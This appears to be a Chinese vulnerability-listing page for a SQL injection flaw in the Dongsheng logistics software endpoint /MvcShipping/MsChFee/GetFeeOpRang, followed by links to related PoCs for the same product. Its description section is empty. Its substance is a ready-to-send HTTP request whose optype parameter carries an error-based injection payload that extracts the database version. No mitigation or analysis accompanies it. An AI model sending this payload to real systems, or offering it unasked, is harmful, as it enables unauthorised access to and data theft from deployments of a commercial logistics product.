东胜物流软件 /MvcShipping/MsChFee/GetFeeOpRang SQL 注入漏洞

漏洞描述

PoC代码

GET /MvcShipping/MsChFee/GetFeeOpRang?limit=25&optype=modOtherRecvFeeManagement'+AND+1%3dCONVERT(int,(SELECT+%40%40version))--&page=1&start=0 HTTP/1.1

相关漏洞推荐

• 东胜物流软件 /Mobile/Login/UnBind SQL 注入漏洞
• 东胜物流软件 YJCX.aspx SQL注入漏洞
• 东胜物流软件 UnBind SQL注入漏洞
• 东胜物流软件 YJCX.aspx 存在SQL注入漏洞
• POC 东胜物流软件 UnBind 存在SQL注入漏洞
• 东胜物流软件 /Areas/Mobile/Views/Login/UserInfo.aspx SQL 注入漏洞
• POC 东胜物流软件 UserInfo.aspx SQL注入漏洞
• 青岛东胜伟业软件有限公司东胜物流软件存在SQL注入漏洞
• 东胜物流软件 UpdateCustomMainfast XXE漏洞
• POC dongshengwuliu-getdatalistca-sqli: 东胜物流软件GetDataListCA接口存在SQL注⼊漏洞
• POC dongshengwuliu-workflowgridsource-sqli: 东胜物流软件WorkFlowGridSource.aspx接口存在SQL注入漏洞
• 东胜物流软件 /Account/Chfee_hexiao/GetDataList SQL 注入漏洞
• POC 东胜物流软件 /WebService/DsWebService.asmx SQL 注入漏洞